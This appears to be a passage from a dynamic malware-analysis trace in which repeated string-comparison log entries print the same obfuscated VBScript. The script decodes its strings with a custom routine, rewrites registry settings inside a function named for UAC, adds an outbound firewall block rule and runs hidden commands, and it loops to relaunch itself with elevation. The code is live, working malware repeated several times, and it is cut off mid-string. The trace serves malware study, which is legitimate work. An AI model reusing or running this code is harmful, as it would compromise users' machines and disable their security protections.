(fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.937] wcsncmp (_String1="r = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.937] wcsncmp (_String1=" = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.937] wcsncmp (_String1="= \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.937] wcsncmp (_String1=" \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.937] wcsncmp (_String1="\"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + 